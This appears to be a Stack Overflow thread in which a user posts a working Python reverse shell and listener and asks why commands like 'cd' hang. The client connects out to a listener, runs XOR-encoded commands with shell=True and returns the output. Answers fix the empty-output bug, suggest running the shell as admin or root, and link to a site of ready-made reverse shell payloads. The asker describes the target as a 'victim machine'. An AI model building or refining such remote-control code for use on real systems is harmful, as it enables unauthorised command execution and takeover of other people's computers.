# Reverse shell using python

Tags: python, shell

I have the following listener and the reverse shell in python:

Listener:

```
import socket 

s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", 443))
s.listen(2)
print "Listening on port 443... "
(client, (ip, port)) = s.accept()
print " Received connection from : ", ip

while True:
 command = raw_input('~$ ')
 encode = bytearray(command)
 for i in range(len(encode)):
   encode[i] ^=0x41
 client.send(encode)
 en_data=client.recv(2048)
 decode = bytearray(en_data)
 for i in range(len(decode)):
   decode[i] ^=0x41
 print decode

client.close()
s.close()
```

reverse shell:

```
import socket, subprocess, sys

RHOST = '127.0.0.1' #sys.argv[1]
RPORT = 443
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((RHOST, RPORT))

while True:
    #receive encoded data
    en_comm = s.recv(1024)
    #decoded the received command
    de_comm = bytearray(en_comm)
    for i in range(len(de_comm)):
        de_comm[i] ^= 0x41

    #execute the clear text comamnd after decode it
    clrtxt_comm = subprocess.Popen(str(de_comm), shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
    output, STDERR = clrtxt_comm.communicate()

    #encode the command output and send it over ssl
    en_output = bytearray(output)
    for i in range(len(en_output)):
        en_output[i] ^= 0x41
    s.send(en_output)

s.close()
```

After start the listener and trigger the reverse shell, it runs ok and opens shell in the victim machine, but the big thing is that when send commands like "cd .." or "mkdir foldername" (in case of Windows) it stuck in the same input and do not go further.

Do you see/ realize what is the issue in the code ?

Thanks a lot !

Answer (score 0, accepted):

I'm guessing you have a few problems.

first and foremost

you need to add something like this for commands that return no output like cd:

```
if not en_output:
    en_output = bytearray("no output")
for i in range(len(en_output)):
    en_output[i] ^= 0x41

s.send(en_output)
```

secondly, when you open a process to execute cd you don't change the path of the reverse shell script. for that you'll have to inject the new path into os.chdir() or do something equivalent (better yet, simply pipe it to a command with output like ls).

third, the reverse shell might be sandboxed, and therefore unable to execute some of the above commands.

Comment: First of all thanks for the answer.
I will change the point you talked about.
But before, what is sandboxed all about ?

Another question, i saw people did this using netcat as a listener and using dup2() as the reverse shell, and it really works. Is this way better or what ?!

Thanks

Comment: sandboxing means every process has a virtual memory made of the files it is allowed to access e.i. read, write, execute (and the sys-calls it can use but that's for a different day). Typically a python process (and all its child processes) might be executed with privileges that only allow it to access files in its directory or in a larger sandbox (like all of the user's files, or all of the files in system). The minute details of sandboxing are very different in every OS. For starters, in windows try to call the reverse_shell.py script from an admin-command line, in linux try executing as root

Answer (score 0):

First of all, I would suggest using a standardized reverse shell payload rather than writing your own. You can find good ones at [https://www.revshells.com](https://www.revshells.com/)

For the listener, I recommended checking out the guide at https://tpetersonkth.github.io/2021/10/16/Creating-a-Basic-Python-Reverse-Shell-Listener.html

Comment: Hi @Thomas Peterson. It is recommended to provide an explanation, a code snippet, anything that adds context to your answer when posting links. Links can change over time, which would render your answer unhelpful. You can check https://stackoverflow.com/help/how-to-answer for recommendations on how to write high-quality answers.

Comment: While this link may answer the question, it is better to include the essential parts of the answer here and provide the link for reference.  Link-only answers can become invalid if the linked page changes. - [From Review](/review/late-answers/32615561)